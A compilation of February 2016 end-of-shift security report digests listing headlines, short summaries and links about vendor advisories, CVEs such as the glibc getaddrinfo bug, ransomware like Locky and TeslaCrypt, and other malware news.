A vulnerability in the Device Manager GUI of the Cisco ACE 4710 Application Control Engine could allow an authenticated, remote attacker to execute any command-line interface (CLI) command on the ACE with admin user privileges.
---------------------------------------------
http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-…
*** Cleaners ought to be clean (and clear) ***
---------------------------------------------
There are many programs that purport to clean up and optimize system performance. While Microsoft does not endorse the use of these tools with Windows, we do not view them as unwanted or malicious. Many programs in this category have a practice of providing a free version of their software that scans your system, ...
---------------------------------------------
https://blogs.technet.microsoft.com/mmpc/2016/02/24/cleaners-ought-to-be-cl…
*** IBM Security Bulletins ***
---------------------------------------------
*** IBM Security Bulletin: Multiple vulnerabilities in the IBM SDK for Node.js affect the Cordova tools in Rational Application Developer affecting Rational Developer for i and Rational Developer for AIX and Linux (CVE-2016-2086, CVE-2016-2216, ***
http://www.ibm.com/support/docview.wss?uid=swg21977146
---------------------------------------------
*** IBM Security Bulletin: Vulnerabilities in OpenSSL affect the Cordova tools in Rational Application Developer affecting Rational Developer for i and Rational Developer for AIX and Linux (CVE-2016-0701, CVE-2015-3197) ***
http://www.ibm.com/support/docview.wss?uid=swg21977144
---------------------------------------------
*** IBM Security Bulletin: Vulnerability in IBM Java SDK affects IBM Explorer for z/OS 3.0 (CVE-2015-7575) ***
http://www.ibm.com/support/docview.wss?uid=swg21976483
---------------------------------------------
*** IBM Security Bulletin: Security vulnerabilities have been identified in IBM WebSphere Application Server shipped with IBM Business Process Manager and WebSphere Lombardi Edition (CVE-2016-0483, CVE-2016-0475, CVE-2016-0466, CVE-2015-7575, ***
http://www.ibm.com/support/docview.wss?uid=swg21977021
---------------------------------------------
*** IBM Security Bulletin: Multiple vulnerabilities in IBM Java SDK Version 8 Service Refresh 2 that affect IBM BigFix Compliance Analytics. ***
http://www.ibm.com/support/docview.wss?uid=swg21976854
---------------------------------------------
*** IBM Security Bulletin: Java specific SLOTH - Weak MD5 Signature Hash ***
http://www.ibm.com/support/docview.wss?uid=swg21975823
---------------------------------------------
*** IBM Security Bulletin: Vulnerability in IBM Java Runtime shipped with WebSphere Partner Gateway Advanced/Enterprise editions (CVE-2015-7575) ***
http://www.ibm.com/support/docview.wss?uid=swg21976925
---------------------------------------------
*** IBM Security Bulletin: Multiple vulnerabilities in IBM Java SDK affect Rational Method Composer (CVE-2015-7575) ***
http://www.ibm.com/support/docview.wss?uid=swg21975877
---------------------------------------------
*** IBM Security Bulletin: Vulnerability in IBM Java SDK affects Rational Developer for System z (CVE-2015-7575) ***
http://www.ibm.com/support/docview.wss?uid=swg21976476
---------------------------------------------
*** IBM Security Bulletin: Multiple vulnerabilities in IBM Java affect IBM SPSS Modeler (CVE-2016-0466, CVE-2015-7575, CVE-2016-0475) ***
http://www.ibm.com/support/docview.wss?uid=swg21977518
---------------------------------------------
*** IBM Security Bulletin: Vulnerability in IBM Java Runtime affects IBM WebSphere MQ (CVE-2015-7575) ***
http://www.ibm.com/support/docview.wss?uid=swg21977523
---------------------------------------------
*** IBM Security Bulletin: Multiple vulnerabilities in IBM Runtime Environments Java Technology Edition, Versions 6, 7, 8 affect IBM Transformation Extender Hypervisor Edition for AIX (CVE-2016-0466, CVE-2015-7575) ***
http://www.ibm.com/support/docview.wss?uid=swg21977061
---------------------------------------------
*** IBM Security Bulletin: Multiple vulnerabilities in IBM Runtime Environments Java Technology Edition, Versions 6, 7, 8 affect IBM Transformation Extender Hypervisor Edition (CVE-2016-0466, CVE-2015-7575) ***
http://www.ibm.com/support/docview.wss?uid=swg21976970
---------------------------------------------
*** IBM Security Bulletin: Multiple vulnerabilities in IBM Java Runtime affect FileNet Content Manager, IBM Content Foundation and FileNet BPM (CVE-2015-7575, CVE-2016-0475, CVE-2016-0466) ***
http://www.ibm.com/support/docview.wss?uid=swg21975820
---------------------------------------------
*** IBM Security Bulletin: Multiple vulnerabilities in IBM Java Runtime affect Tivoli Netcool/OMNIbus (Multiple CVEs) ***
http://www.ibm.com/support/docview.wss?uid=swg21976845
---------------------------------------------
*** IBM Security Bulletin: Fixes available for Security Vulnerabilities in IBM WebSphere Portal ***
http://www.ibm.com/support/docview.wss?uid=swg21976358
---------------------------------------------
=======================
= End-of-Shift report =
=======================
Timeframe: Monday 22-02-2016 18:00 − Tuesday 23-02-2016 18:00
Handler: Alexander Riepl
Co-Handler: n/a
*** CVE-2016-0034 (Silverlight up to 5.1.41105.0) and Exploit Kits ***
---------------------------------------------
http://malware.dontneedcoffee.com/2016/02/cve-2016-0034.html
*** Incident Handling with Docker Containers ***
---------------------------------------------
Honestly, I never really played with Docker but - For a few weeks, I succumbed to the temptation of playing with Docker thanks to a friend who's putting everything in docker containers. If you still don't know Docker, here is a very brief ..
---------------------------------------------
https://blog.rootshell.be/2016/02/22/incident-handling-docker-to-the-rescue/
*** Is DNSSEC causing more problems than it solves? ***
---------------------------------------------
New paper points to security protocol as vector for DDoS attacks. The complex security protocol for the domain name system - DNSSEC - has another black mark against it: it is being used as a way to carry out denial-of-service (DDoS) ..
---------------------------------------------
www.theregister.co.uk/2016/02/23/dnssec_more_problem_than_solution/
*** Ecommerce fraud surges 163% ***
---------------------------------------------
The worst fears of online retailers have been confirmed with data just released today: in 2015, the number of attacks by fraudsters was up 163 percent - growing two and a half times in a mere three-quarter period. This data is part of the newly ..
---------------------------------------------
https://www.helpnetsecurity.com/2016/02/23/ecommerce-fraud-surges-163/
*** Fraudsters stole 147,000 euros online from a Graz company ***
---------------------------------------------
Unknown perpetrators broke into the company network and transferred the amount to a Polish account. The money is lost.
---------------------------------------------
http://futurezone.at/b2b/betrueger-stahlen-grazer-unternehmen-online-147-00…
*** 90% of SSL VPNs use insecure or outdated encryption, putting your data at risk ***
---------------------------------------------
Have you ever thought about how secure and reliable your SSL VPN is? You probably should.
---------------------------------------------
https://www.htbridge.com/blog/90-percent-of-ssl-vpns-use-insecure-or-outdat…
*** Mobile malware evolution 2015 ***
---------------------------------------------
As the functionality of mobile devices and mobile services grows, the appetite of cybercriminals who profit from mobile malware will grow too. Malware authors will continue to improve their creations, develop new technologies and look for new ways of spreading mobile malware. Their main aim is to make money.
---------------------------------------------
http://securelist.com/analysis/kaspersky-security-bulletin/73839/mobile-mal…
*** Hackers aren't so interested in your credit card data these days. That's bad news ***
---------------------------------------------
World governments now primary sources of breaches. Healthcare and government have overtaken the retail sector as most-targeted for data breaches, according to security firm ..
---------------------------------------------
www.theregister.co.uk/2016/02/23/breach_trends_gemalto/
*** Security researchers: threat from Android banking Trojans greater than ever ***
---------------------------------------------
Kaspersky sees an Android Trojan as "one of the greatest threats we currently know of", while security experts at IBM report that the source code of a well-known Trojan has been published. A tutorial invites people to try it out.
---------------------------------------------
http://heise.de/-3115424
*** Two Charts That Demonstrate One Of Android's Big Security Problems ***
---------------------------------------------
Applying the most recent security updates to your device's operating system is a best practice security fundamental. If you're not running the latest version of an OS, you're opening ..
---------------------------------------------
https://labsblog.f-secure.com/2016/02/23/two-charts-that-demonstrate-one-of…
*** Flaws in Wireless Mice and Keyboards Let Hackers Type on Your PC ***
---------------------------------------------
Security researchers' "mousejacking" attack exploits vulnerable wireless devices to type on a target PC from a hundred yards away.
---------------------------------------------
http://www.wired.com/2016/02/flaws-in-wireless-mice-and-keyboards-let-hacke…
*** Cisco Nexus 2000 Series Fabric Extender Software Default Credential Vulnerability ***
---------------------------------------------
http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-…
*** PowerPoint and Custom Actions ***
---------------------------------------------
We've recently observed a Phishing attack which uses PowerPoint Custom Actions instead of macros to execute a malicious payload. Although using PowerPoint attachments is not new, these types of attacks are interesting as they generally bypass controls that assert on macro enabled Office attachments.
---------------------------------------------
http://phishme.com/powerpoint-and-custom-actions/
*** TYPO3 CMS 6.2.19 and 7.6.4 released ***
---------------------------------------------
https://typo3.org/news/article/typo3-cms-6219-and-764-released/
=======================
= End-of-Shift report =
=======================
Timeframe: Friday 19-02-2016 18:00 − Monday 22-02-2016 18:00
Handler: Alexander Riepl
Co-Handler: n/a
*** glibc: new version fixes dramatic vulnerability in Linux network functions ***
---------------------------------------------
The glibc team has apparently fixed, in version 2.23, the critical bug that attackers could use to take over Linux systems. The other changes, such as Unicode 8 support, are overshadowed by the bugfix.
---------------------------------------------
http://heise.de/-3112519
*** Joomla Sites Join WordPress As TeslaCrypt Ransomware Target ***
---------------------------------------------
Joomla is the newest prey of attackers behind a campaign that has targeted WordPress websites by injecting JavaScript files with malicious code.
---------------------------------------------
http://threatpost.com/joomla-sites-join-wordpress-as-teslacrypt-ransomware-…
*** PCI DSS 3.2 slated for early 2016 ***
---------------------------------------------
PCI DSS version 3.2, scheduled for release in the first half of 2016, likely March or April, will address the current threat landscape as well as "trending attacks causing compromises" detailed in current breach forensics reports.
---------------------------------------------
http://www.scmagazine.com/pci-dss-32-slated-for-early-2016/article/478089/
*** Investigating a Compromised Server with Rootcheck ***
---------------------------------------------
What do you do if you suspect your server (VPS or dedicated) has been compromised? If you are a customer, you have the option to leverage our team to perform the incident response on your behalf, but what if you want to do an investigation on your own? In this ..
---------------------------------------------
https://blog.sucuri.net/2016/02/investigating-a-compromised-server-with-roo…
*** How private individuals are misused by online criminals for money laundering ***
---------------------------------------------
Criminal gangs use inconspicuous private individuals for money laundering. Recently they have also been targeting refugees. The people behind it are almost impossible to reach.
---------------------------------------------
http://heise.de/-3112859
*** Security: mysterious rise in Tor addresses ***
---------------------------------------------
An unusual rise in .onion addresses in the Tor network is currently puzzling observers. The reason for the rise could be a new messaging app, or malware.
---------------------------------------------
http://www.golem.de/news/security-sprunghafter-anstieg-von-tor-adressen-160…
*** Warning - Linux Mint Website Hacked and ISOs replaced with Backdoored Operating System ***
---------------------------------------------
Are you also the one who downloaded Linux Mint on February 20th? You may have been infected! Linux Mint is one of the best and most popular Linux distros available today, but if you have downloaded and installed the operating system recently you ..
---------------------------------------------
https://thehackernews.com/2016/02/linux-mint-hack.html
*** DSA-3479 graphite2 - security update ***
---------------------------------------------
Multiple vulnerabilities have been found in the Graphite font rendering engine which might result in denial of service or the execution of arbitrary code if a malformed font file is processed.
---------------------------------------------
https://www.debian.org/security/2016/dsa-3479
*** Synology NAS DSM 5.2 Remote Code Execution (RCE) ***
---------------------------------------------
RCE in Synology NAS DSM 5.2 due to lack of input sanitisation. RCE triggered indirectly via port forwarding mechanism in the NAS UI.
---------------------------------------------
http://rileykidd.com/2016/01/12/synology-nas-dsm-5-2-remote-code-execution-…
*** A Skeleton Key of Unknown Strength ***
---------------------------------------------
TL;DR: The glibc DNS bug (CVE-2015-7547) is unusually bad. Even Shellshock and Heartbleed tended to affect things we knew were on the network and knew we had to defend. This affects a universally used library (glibc) at a universally used protocol (DNS). Generic tools that we didn't even know had network surface (sudo) are thus exposed, as is software written in ..
---------------------------------------------
http://dankaminsky.com/2016/02/20/skeleton/
*** Security researchers: pirate app store temporarily in Apple's App Store ***
---------------------------------------------
Over several months, an iOS app available in Apple's official software store and disguised as a translation tool apparently offered its users cracked apps for download.
---------------------------------------------
http://heise.de/-3113988
*** Germany: "Bundestrojaner" is ready for use ***
---------------------------------------------
After months of preparation, investigators in Germany now have their own software for online searches at their disposal.
---------------------------------------------
http://futurezone.at/netzpolitik/deutschland-bundestrojaner-ist-einsatzbere…
*** New tactic: crypto-Trojan Locky spread via JavaScript files ***
---------------------------------------------
After the encryption Trojan was initially distributed mainly via Office files, the perpetrators are now sending scripts. As a result, a sausage manufacturer from Ludwigslust has involuntarily become the point of contact for Locky victims.
---------------------------------------------
http://heise.de/-3113689
=======================
= End-of-Shift report =
=======================
Timeframe: Thursday 18-02-2016 18:00 − Friday 19-02-2016 18:00
Handler: Alexander Riepl
Co-Handler: n/a
*** Maimed Ramnit Still Lurking in the Shadow ***
---------------------------------------------
https://www.fireeye.com/blog/threat-research/2016/02/maimed_ramnit_still.ht…
*** ZDI-16-172: Google Chrome Pdfium JPEG2000 Out-Of-Bounds Read Remote Code Execution Vulnerability ***
---------------------------------------------
This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Google Chrome. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.
---------------------------------------------
http://www.zerodayinitiative.com/advisories/ZDI-16-172/
*** Multiple vulnerabilities in SAP 3D Visual Enterprise Viewer SketchUp document ***
---------------------------------------------
http://www.zerodayinitiative.com/advisories/ZDI-16-176/
http://www.zerodayinitiative.com/advisories/ZDI-16-175/
http://www.zerodayinitiative.com/advisories/ZDI-16-174/
http://www.zerodayinitiative.com/advisories/ZDI-16-173/
*** Crypto-Trojan Locky rampages in Germany: over 5000 infections per hour ***
---------------------------------------------
The new ransomware Locky is apparently finding victims en masse in this country, including a Fraunhofer institute. The perpetrators have meanwhile even taught their malware German.
---------------------------------------------
http://heise.de/-3111774
*** B+B SmartWorx VESP211 Authentication Bypass Vulnerability ***
---------------------------------------------
This advisory contains mitigation details for an authentication bypass vulnerability in B+B SmartWorx's VESP211 serial servers.
---------------------------------------------
https://ics-cert.us-cert.gov/advisories/ICSA-16-049-01
*** AMX Multiple Products Credential Management Vulnerabilities ***
---------------------------------------------
This advisory contains mitigation details for hard-coded passwords in multiple AMX products.
---------------------------------------------
https://ics-cert.us-cert.gov/advisories/ICSA-16-049-02
*** Privilege escalation: yet another security vulnerability at Comodo ***
---------------------------------------------
An insecure default password in the Comodo Internet Security suite allows attackers to escalate their privileges in order to run arbitrary programs. On the computer itself, but possibly also remotely.
---------------------------------------------
http://www.golem.de/news/privilege-escalation-schon-wieder-sicherheitslueck…
*** Citrix NetScaler Application Delivery Controller and NetScaler Gateway Multiple Security Updates ***
---------------------------------------------
http://support.citrix.com/article/CTX206001
=======================
= End-of-Shift report =
=======================
Timeframe: Wednesday 17-02-2016 18:00 − Thursday 18-02-2016 18:00
Handler: Alexander Riepl
Co-Handler: n/a
*** WordPress Sites Leveraged in Layer 7 DDoS Campaigns ***
---------------------------------------------
We first disclosed that the WordPress pingback method was being misused to perform massive layer 7 Distributed Denial of Service (DDoS) attacks back in March 2014. The problem, as previously described, was that any WordPress website with the pingback feature enabled (which is on by default) could ..
---------------------------------------------
https://blog.sucuri.net/2016/02/wordpress-sites-leveraged-in-ddos-campaigns…
*** Angler exploit kit generated by "admedia" gates, (Thu, Feb 18th) ***
---------------------------------------------
On 2016-02-01, the Sucuri blog reported a spike in compromised WordPress sites generating hidden iframes with malicious URLs [1]. By 2016-02-02, I started seeing exploit kit (EK) traffic related to this campaign [2]. Sucuri noted that admedia was a common string used in malicious URLs generated by ..
---------------------------------------------
https://isc.sans.edu/diary.html?storyid=20741
*** SimpliSafe home alarms transmit PIN unlock codes in the clear - ideal for lurking burglars ***
---------------------------------------------
How to break into hundreds of thousands of homes in America. If you've got a SimpliSafe wireless home alarm system, as hundreds of thousands of homes in the US apparently do, then it's time to buy a new alarm system because yours is screwed.
---------------------------------------------
www.theregister.co.uk/2016/02/17/simplisafe_wireless_home_alarm_system_crac…
*** Nodejs - Access bypass - Moderately Critical -- DRUPAL-SA-CONTRIB-2016-007 ***
---------------------------------------------
The module doesn't disconnect unauthenticated sockets, allowing those sockets to receive broadcast messages. For sites that only serve authenticated pages, or only allow Node.js connections from authenticated users, the expectation is that only authenticated Drupal users will see broadcast messages.
---------------------------------------------
https://www.drupal.org/node/2670636
*** Commerce Authorize.Net SIM/DPM Payment Methods - Access Bypass - DRUPAL-SA-CONTRIB-2016-006 ***
---------------------------------------------
The module doesn't sufficiently protect against the premature triggering of order completion without successful payment by the manual entry of a specially-constructed URL which contains the correct payment redirect key.
---------------------------------------------
https://www.drupal.org/node/2670632
*** Instagram rolls out two factor authentication ***
---------------------------------------------
But SMS is still a mess. Hipsters and selfie-lovers will enjoy extra security after Instagram added two-factor authentication to its service.
---------------------------------------------
www.theregister.co.uk/2016/02/18/instagram_rolls_out_two_factor_authenticat…
*** Radio regulation: TP-Link must lock down Wi-Fi firmware ***
---------------------------------------------
TP-Link is locking down the firmware of all its Wi-Fi devices. Other manufacturers are apparently doing the same. As a result, users can no longer maintain their devices themselves. This is the effect of the new radio regulation on both sides of the Atlantic.
---------------------------------------------
http://heise.de/-3109847
*** Court-ordered iPhone unlocking: Google CEO backs Apple CEO's resistance ***
---------------------------------------------
Google CEO Sundar Pichai, like Apple CEO Tim Cook, believes that if the FBI prevails in its demand that Apple must help unlock an iPhone, a risky precedent will be set.
---------------------------------------------
http://heise.de/-3109864
*** These were the Top 10 Android Threats in 2015 - Plus, What to Expect in 2016 ***
---------------------------------------------
Mobile World Congress is next week and F-Secure is jazzed to be participating again - it promises to be another awesome expo. But while the tech world buzzes about which devices will be unveiled by the top handset makers, leave it to us to interrupt the conversation to remind you about security ..
---------------------------------------------
http://safeandsavvy.f-secure.com/2016/02/18/these-were-the-top-10-android-t…
*** DSA-3482 libreoffice - security update ***
---------------------------------------------
An anonymous contributor working with VeriSign iDefense Labs discovered that libreoffice, a full-featured office productivity suite, did not correctly handle Lotus WordPro files. This would enable an attacker to crash the program, or execute arbitrary code, by supplying a specially crafted ..
---------------------------------------------
https://www.debian.org/security/2016/dsa-3482
*** Ransomware: US hospital pays ransom of 40 Bitcoins ***
---------------------------------------------
A hospital in Los Angeles paid out Bitcoins worth 15,000 euros to get back its data, which had been encrypted by an extortion trojan. That was the fastest way, the hospital's CEO said.
---------------------------------------------
http://heise.de/-3109956
*** VB2015 paper: Will Android Trojans, Worms or Rootkits Survive in SEAndroid and Containerization? ***
---------------------------------------------
Sophos researchers Rowland Yu and William Lee look at whether recent security enhancements to Android, such as SEAndroid and containerization, will be enough to defeat future malware threats.
---------------------------------------------
https://www.virusbulletin.com/blog/2016/02/vb2015-paper-will-android-trojan…
*** A Letter to the Insiders - Think Twice ***
---------------------------------------------
Insider threats come in many forms, from the unwitting to the negligent, and even the downright malicious. For those who may be unwillingly co-opted into cybercrime, either by subterfuge or coercion, we can provide education, technical measures, policies and processes that limit the risk. But what can ..
---------------------------------------------
https://blog.team-cymru.org/2016/02/a-letter-to-the-insiders-think-twice/
*** New Ransomware PadCrypt: The first with Live Chat Support ***
---------------------------------------------
A new ransomware has been discovered and what sets this variant apart from the rest is its implementation of a chat interface embedded into the product. That link for 'Live Chat' will prompt...
---------------------------------------------
http://www.webroot.com/blog/2016/02/18/new-ransomware-padcrypt-first-live-c…
=======================
= End-of-Shift report =
=======================
Timeframe: Dienstag 16-02-2016 18:00 − Mittwoch 17-02-2016 18:00
Handler: Alexander Riepl
Co-Handler: n/a
*** Cisco 1000 Series Connected Grid Routers SNMP BRIDGE MIB Denial of Service Vulnerability ***
---------------------------------------------
http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-…
*** Stuxnet as the first act: USA wanted to cripple Iran with cyberattack ***
---------------------------------------------
Secret project "Nitro Zeus" was meant to destroy infrastructure; in addition, detailed plans against a nuclear facility ..
---------------------------------------------
http://derstandard.at/2000031233923
*** Machine learning: artificial neural networks make password cracking easier ***
---------------------------------------------
A proof of concept shows that, with some training, artificial neural networks can be used to crack passwords. Even with fairly complex ones this works surprisingly well.
---------------------------------------------
http://www.golem.de/news/machine-learning-kuenstliche-neuronale-netzwerke-e…
*** Pwning CCTV cameras ***
---------------------------------------------
CCTV is ubiquitous in the UK. A recent study estimates there are about 1.85m cameras across the UK - most in private premises. Most of those cameras will be connected to some kind of recording device, which these days means a Digital Video Recorder or DVR.
---------------------------------------------
https://www.pentestpartners.com/blog/pwning-cctv-cameras/
*** Court order to unlock iPhone: Apple CEO Tim Cook refuses ***
---------------------------------------------
In an unusual step, Tim Cook has addressed customers in an open letter. In it he explains why the company refuses to help the FBI with a backdoor in its investigations.
---------------------------------------------
http://heise.de/-3107769
*** Devastating bug endangers almost all Linux systems ***
---------------------------------------------
Bug in glibc can be exploited to smuggle in code - update urgently recommended
---------------------------------------------
http://derstandard.at/2000031281408
*** Linux Fysbis Trojan, a new weapon in the Pawn Storm's arsenal ***
---------------------------------------------
Malware researchers at PaloAlto discovered the Fysbis Trojan, a simple and effective Linux threat used by the Russian cyberspy group Pawn Storm. Do you remember the Pawn Storm hacking crew? Security experts have identified this group of Russian hackers with several names, including ..
---------------------------------------------
http://securityaffairs.co/wordpress/44551/hacking/pawn-storm-linux-fysbis-t…
*** Mazar: researchers warn of powerful Android malware ***
---------------------------------------------
Uses the Tor network to cover its tracks - can take full control, but requires considerable cooperation from the user
---------------------------------------------
http://derstandard.at/2000031296473
*** OceanLotus for OS X - an Application Bundle Pretending to be an Adobe Flash Update ***
---------------------------------------------
In May 2015, researchers at Qihoo 360 published a report on OceanLotus that included details about malware targeting Chinese infrastructure. In that report, there is a description about a piece of malware that targets OS X systems. A sample of that malware was uploaded to VirusTotal a few months ..
---------------------------------------------
https://www.alienvault.com/open-threat-exchange/blog/oceanlotus-for-os-x-an…
*** [HTB23284]: RCE via CSRF in osCommerce ***
---------------------------------------------
High-Tech Bridge Security Research Lab discovered a vulnerability in the popular e-commerce software osCommerce, which has 280,000 store owners (according to the vendor). The vulnerability can be exploited to execute arbitrary PHP code on the remote system and compromise the vulnerable web application, its database and even the web server and related environment.
---------------------------------------------
https://www.htbridge.com/advisory/HTB23284
*** [HTB23291]: SQL Injection in webSPELL ***
---------------------------------------------
High-Tech Bridge Security Research Lab discovered two vulnerabilities in webSPELL, a popular CMS developed for the needs of esport-related communities. The vulnerability allows a remote authenticated attacker with cashbox access privileges to execute arbitrary SQL commands ..
---------------------------------------------
https://www.htbridge.com/advisory/HTB23291
*** The Dridex Banking Trojan ***
---------------------------------------------
Dridex is a generation of banking trojans, one of the most prominent threats for companies. A banking trojan is basically malicious software (malware) that tries to obtain confidential information from your computer system, specifically targeting online banking and payment systems. The Dridex trojan is equipped to steal all data necessary for fraudulent activities.
---------------------------------------------
http://www.techknow.one/forum/index.php?topic=9346
=======================
= End-of-Shift report =
=======================
Timeframe: Montag 15-02-2016 18:00 − Dienstag 16-02-2016 18:00
Handler: Alexander Riepl
Co-Handler: n/a
*** More Multi-Architecture IoT Malware, (Mon, Feb 15th) ***
---------------------------------------------
Attackers have problems too: Attacks against Internet of Things (IoT) devices are simple (as in log in...), but the attacker never knows what kind of architecture they may hit. IoT devices often go beyond the standard x86 architecture we are used to on our servers and workstations. What I typically see ..
---------------------------------------------
https://isc.sans.edu/diary.html?storyid=20731
*** Password cracking attacks on Bitcoin wallets net $103,000 ***
---------------------------------------------
Hackers have siphoned about $103,000 out of Bitcoin accounts that were protected with an alternative security measure, according to research that tracked six years' worth of transactions. Account-holders used easy-to-remember passwords to protect their accounts instead of the long cryptographic keys normally required.
---------------------------------------------
http://arstechnica.com/security/2016/02/password-cracking-attacks-on-bitcoi…
*** Cisco Emergency Responder Cross-Site Scripting Vulnerability ***
---------------------------------------------
http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-…
*** Cisco IOS Software for Cisco Industrial Ethernet 2000 Series Switches Denial of Service Vulnerability ***
---------------------------------------------
http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-…
*** Exploiting (pretty) blind SQL injections, (Mon, Feb 15th) ***
---------------------------------------------
Although a lot has been written about SQL injection vulnerabilities, they can still be found relatively often. In most of the cases I've seen in the last couple of years, I had to deal with blind SQL injection vulnerabilities. Typically, ..
---------------------------------------------
https://isc.sans.edu/diary.html?storyid=20733
*** VoIP phones can be turned into spying or money-making tools ***
---------------------------------------------
A security vulnerability present in many enterprise-grade VoIP phones can easily be exploited by hackers to spy on employees and management, says security consultant Paul Moore. In a less dangerous attack alternative, these compromised devices can also be made to covertly place calls to premium ..
---------------------------------------------
https://www.helpnetsecurity.com/2016/02/16/voip-phones-can-turned-spying-mo…
*** Ransomware: besides German hospitals, US clinic also crippled by virus ***
---------------------------------------------
It is not only in Germany that hospitals are repeatedly fighting encryption trojans. In Los Angeles, a clinic has been paralysed for more than a week. The programmers are allegedly demanding more than 3 million US dollars in ransom.
---------------------------------------------
http://heise.de/-3103733
*** "Fake President": e-mail fraudsters relieve corporations of millions ***
---------------------------------------------
executive board accounts and turn unsuspecting accountants into their accomplices
---------------------------------------------
http://derstandard.at/2000031179980
*** ATMs: skimming at the network socket ***
---------------------------------------------
Skimming is a well-known problem - criminals use replica keypads and magnetic card readers to copy customer data at ATMs. Now the manufacturer NCR is warning of new dangers.
---------------------------------------------
http://www.golem.de/news/geldautomaten-skimming-an-der-netzwerkbuchse-1602-…
*** USN-2855-2: Samba regression ***
---------------------------------------------
Ubuntu Security Notice USN-2855-2, 16th February, 2016. samba regression. A security issue affects these releases of Ubuntu and its derivatives: Ubuntu 15.10, Ubuntu 14.04 LTS, Ubuntu 12.04 LTS. Summary: USN-2855-1 introduced a regression in ..
---------------------------------------------
http://www.ubuntu.com/usn/usn-2855-2/
*** Extortion trojan Locky apparently strikes in a coordinated fashion ***
---------------------------------------------
Locky presumably lurked on the infected systems for a while before it began encrypting personal files on several victims at the same time last Monday.
---------------------------------------------
http://heise.de/-3104069
*** Stuxnet allegedly part of a larger attack on Iran's critical infrastructure ***
---------------------------------------------
That the USA and Israel were behind Stuxnet in order to disrupt Iran's nuclear programme is now considered established. A new documentary film claims that the cyber worm was part of a much larger programme intended to cripple all of Iran.
---------------------------------------------
http://heise.de/-3104957
*** TYPO3 CMS 6.2.18 and 7.6.3 released ***
---------------------------------------------
Both versions are maintenance releases and contain bug and security fixes. If the extension compatibility6 is used, please make sure to upgrade to version 7.6.2.
---------------------------------------------
https://typo3.org/news/article/typo3-cms-6218-and-763-released/
*** Glibc: security vulnerability endangers almost all Linux systems ***
---------------------------------------------
A serious security vulnerability exists in the Glibc library, which is used in almost all Linux systems: a DNS function allows the execution of malicious code. Users should install updates as quickly as possible.
---------------------------------------------
http://www.golem.de/news/glibc-sicherheitsluecke-gefaehrdet-fast-alle-linux…
*** CVE-2015-7547 --- glibc getaddrinfo() stack-based buffer overflow ***
---------------------------------------------
The glibc project thanks the Google Security Team and Red Hat for reporting the security impact of this issue, and Robert Holiday of Ciena for reporting the related bug 18665.
---------------------------------------------
https://sourceware.org/ml/libc-alpha/2016-02/msg00416.html
=======================
= End-of-Shift report =
=======================
Timeframe: Freitag 12-02-2016 18:00 − Montag 15-02-2016 18:00
Handler: Alexander Riepl
Co-Handler: n/a
*** A Look Behind The Skype Malvertising Campaign ***
---------------------------------------------
As reported by F-Secure, a recent malvertising campaign has been hitting several top publishers to push the Angler exploit kit and install the TeslaCrypt ransomware, according to the Finnish company. Some of these infections happened via Skype, which displays ad banners within its product.
---------------------------------------------
https://blog.malwarebytes.org/malvertising-2/2016/02/a-look-behind-the-skyp…
*** Fake SUPEE-5344 Patch Steals Payment Details ***
---------------------------------------------
In case you don't know, SUPEE-5344 is an official security patch to the infamous Magento shoplift bug. That bug allows bad actors to obtain admin access to vulnerable Magento sites. While the patch was released February 2015 many sites unfortunately did ..
---------------------------------------------
https://blog.sucuri.net/2016/02/fake-supee-5344-patch-steals-payment-detail…
*** VMware VMSA-2015-0007.3 has been Re-released, (Sat, Feb 13th) ***
---------------------------------------------
VMware has re-issued VMSA-2015-0007.3 today after they found an earlier fix for CVE-2016-2342 was incomplete. Affected ESXi versions are: 5.0, 5.1 and 5.5. The advisory can be ..
---------------------------------------------
https://isc.sans.edu/diary.html?storyid=20727
*** Critical Fixes Issued for Windows, Java, Flash ***
---------------------------------------------
Microsoft Windows users and those with Adobe Flash Player or Java installed, it's time to update again! Microsoft released 13 updates to address some three dozen unique security vulnerabilities. Adobe issued security updates for its Flash Player software that plug at least 22 security holes in the widely-used browser plugin. Meanwhile, Oracle issued an unscheduled security fix for Java, its second security update for Java in as many weeks.
---------------------------------------------
http://krebsonsecurity.com/2016/02/criticial-fixes-issued-for-windows-java-…
*** Encryption trojan: mp3 variant of TeslaCrypt ***
---------------------------------------------
Readers gave the editorial team hints about encrypted files with the extension .mp3. These appear to be created by a new variant of the encryption trojan TeslaCrypt.
---------------------------------------------
http://heise.de/-3101992
*** DSA-3477 iceweasel - security update ***
---------------------------------------------
Holger Fuhrmannek discovered that missing input sanitising in the Graphite font rendering engine could result in the execution of arbitrary code.
---------------------------------------------
https://www.debian.org/security/2016/dsa-3477
*** Nigerian astronaut lost in space: spam delights the net ***
---------------------------------------------
Users can supposedly double an investment of three million dollars
---------------------------------------------
http://derstandard.at/2000031110981
*** IT security: ever more complex attacks on companies ***
---------------------------------------------
New cybersecurity report shows heightened threat level on the internet
---------------------------------------------
http://derstandard.at/2000031119634
*** Mazar Bot Actively Targeting Android Devices ***
---------------------------------------------
Researchers at Heimdal Security report public attacks against Android devices using the Mazar bot, which was advertised months ago in a Russian cybercrime forum.
---------------------------------------------
http://threatpost.com/mazar-bot-actively-targeting-android-devices/116240/
*** Update to version 1.17: VeraCrypt is now supposed to be twice as fast ***
---------------------------------------------
VeraCrypt is one of the most popular successors of the discontinued TrueCrypt - an update now brings new features. In addition, loading containers is supposed to be noticeably faster - until now one of the biggest points of criticism ..
---------------------------------------------
http://www.golem.de/news/update-auf-version-1-17-veracrypt-soll-jetzt-doppe…
*** Virus crippled hospital in Germany ***
---------------------------------------------
"Findings had to be transmitted in person, by telephone or by fax"
---------------------------------------------
http://derstandard.at/2000031136914
*** [R1] Nessus < 6.5.5 Multiple Vulnerabilities ***
---------------------------------------------
http://www.tenable.com/security/tns-2016-02
*** Reflecting on Recent iOS and Android Security Updates ***
---------------------------------------------
The last thirty days have proven to be yet another exciting time for the mobile security ecosystem. Apple and Google released updates for their respective mobile operating systems that fix several critical issues - including some in the kernel that may be exploited remotely.
---------------------------------------------
https://blog.zimperium.com/reflecting-on-recent-ios-and-android-security-up…
=======================
= End-of-Shift report =
=======================
Timeframe: Donnerstag 11-02-2016 18:00 − Freitag 12-02-2016 18:00
Handler: Stephan Richter
Co-Handler: n/a
